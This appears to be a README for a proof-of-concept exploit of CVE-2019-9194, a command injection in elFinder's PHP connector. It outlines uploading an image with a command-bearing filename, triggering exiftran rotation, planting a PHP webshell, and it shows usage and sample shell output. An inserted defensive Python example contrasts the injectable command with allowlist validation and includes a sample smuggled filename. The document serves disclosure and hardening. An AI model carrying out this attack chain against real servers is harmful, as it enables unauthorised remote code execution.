## https://sploitus.com/exploit?id=84295AD6-4CA5-52DF-949D-5243E681C6BA
# CVE-2019-9194 — elFinder Command Injection (PoC)
> Command injection vulnerability in elFinder <= 2.1.47 via the PHP connector component. Allows unauthenticated remote code execution as the web server user.
## How it works
1. Uploads a valid JPEG with a malicious filename containing a shell command.
2. Triggers the vulnerability by requesting an image rotation, which passes the filename to exiftran without sanitization.
3. The injected command writes a PHP webshell (SecSignal.php) to the server.
4. Connects to the webshell and drops into an interactive shell.
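The root cause in the steps above is a user-controlled filename reaching a shell-interpreted `exiftran` command line. The following is an added example, not code from the PoC, from elFinder, or from any of the credited authors; it puts the unsafe string-building pattern next to an argv-based call guarded by a filename allowlist. Function names and the allowlist policy are assumptions chosen for illustration; the `-i`, `-9`, `-1` and `-2` flags are exiftran's documented in-place/rotation options.

```python
"""Filename validation and shell-free invocation for an image-rotation step.

Added illustration (not elFinder's or the PoC's code). Shows why splicing a
file name into a shell string is exploitable and how an argv list plus an
allowlist removes the injection surface.
"""
import os
import re
import shlex
import subprocess
from typing import List, Optional

# Allowlist: ASCII letters, digits, dot, underscore, dash. The first character
# may not be "-" so the name can never be parsed as an exiftran option.
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9._-]*")

# Characters that carry meaning for /bin/sh; none of them belongs in a name
# that will ever be placed on a command line.
SHELL_META = set(";|&$`<>()\n\r'\" \\")

# exiftran flags for the rotations a gallery needs (-i edits in place).
ROTATE_FLAG = {90: "-9", 180: "-1", 270: "-2"}


def unsafe_reason(name: str) -> Optional[str]:
    """Return why a bare file name is rejected, or None if it passes."""
    if not name or name in (".", ".."):
        return "empty or dot name"
    if "/" in name or "\\" in name or ".." in name:
        return "path separator or traversal"
    if name.startswith("-"):
        return "leading dash (option injection)"
    bad = sorted(set(name) & SHELL_META)
    if bad:
        return "shell metacharacters: " + "".join(bad)
    if not SAFE_NAME.fullmatch(name):
        return "character outside allowlist"
    return None


def is_safe_filename(name: str) -> bool:
    return unsafe_reason(name) is None


def vulnerable_command(path: str, degrees: int) -> str:
    """The pattern behind CVE-2019-9194: the name is interpolated into a
    string that a shell will later parse. Built here only to show the shape;
    it is never executed by this module."""
    return f"exiftran -i {ROTATE_FLAG[degrees]} {path}"


def quoted_command(path: str, degrees: int) -> str:
    """If a shell string is unavoidable, quote the operand. This is a second
    line of defence; the allowlist in hardened_argv() is the primary one."""
    return f"exiftran -i {ROTATE_FLAG[degrees]} {shlex.quote(path)}"


def hardened_argv(path: str, degrees: int) -> List[str]:
    """argv for exiftran with no shell in the loop and a validated name."""
    if degrees not in ROTATE_FLAG:
        raise ValueError(f"unsupported rotation {degrees}")
    name = os.path.basename(path)
    reason = unsafe_reason(name)
    if reason is not None:
        raise ValueError(f"refusing {name!r}: {reason}")
    return ["exiftran", "-i", ROTATE_FLAG[degrees], path]


def rotate_in_place(path: str, degrees: int) -> None:
    """Run the validated argv directly (shell=False), so metacharacters in the
    name would be passed to exiftran as plain bytes, not interpreted."""
    subprocess.run(hardened_argv(path, degrees), shell=False, check=True)


if __name__ == "__main__":
    # Constructed sample names: one ordinary, one carrying a shell separator.
    for sample in ("photo_01.jpg", "a;b.jpg", "-r.jpg", "../x.jpg"):
        print(f"{sample!r}: {unsafe_reason(sample) or 'ok'}")
    print(vulnerable_command("a;b.jpg", 90))   # shows the injectable shape
    print(quoted_command("a;b.jpg", 90))       # quoted operand
    print(hardened_argv("/srv/files/photo_01.jpg", 90))
```

The allowlist is deliberately stricter than "escape the bad characters": rejecting the name at upload time means no later code path (thumbnailing, resizing, archive creation) can reintroduce the problem, and the leading-dash rule closes option injection that quoting alone does not address.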
## Requirements
- Python 3
- requests library (pip install requests)
- Target must have exiftran installed and the elFinder PHP connector enabled (connector.minimal.php)
## Usage
```bash
python3 exploit.py http://TARGET
```
### Example:
```bash
$ python3 exploit.py http://10.10.10.10/elFinder
[*] Uploading malicious image...
[*] File uploaded, hash: l1_U2VjU2lnbmFsLmpwZw
[*] Triggering command injection via image rotation...
[*] Checking for webshell...
[+] Pwned!
[+] Interactive shell (Ctrl+C to exit)
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
## References
- [CVE-2019-9194](https://nvd.nist.gov/vuln/detail/CVE-2019-9194)
- [EDB-46481](https://www.exploit-db.com/exploits/46481)
- [Vulnerability writeup — SecSignal](https://github.com/advisories/GHSA-4223-qj94-7x9p)
- [elFinder 2.1.48 release (fix)](https://github.com/Studio-42/elFinder/releases/tag/2.1.48)
## Credits
- Discovery: Thomas Chauchefoin
- Original exploit: @q3rv0
- Python 3 port & Metasploit-style improvements: [Esteban Zárate](https://github.com/estebanzarate)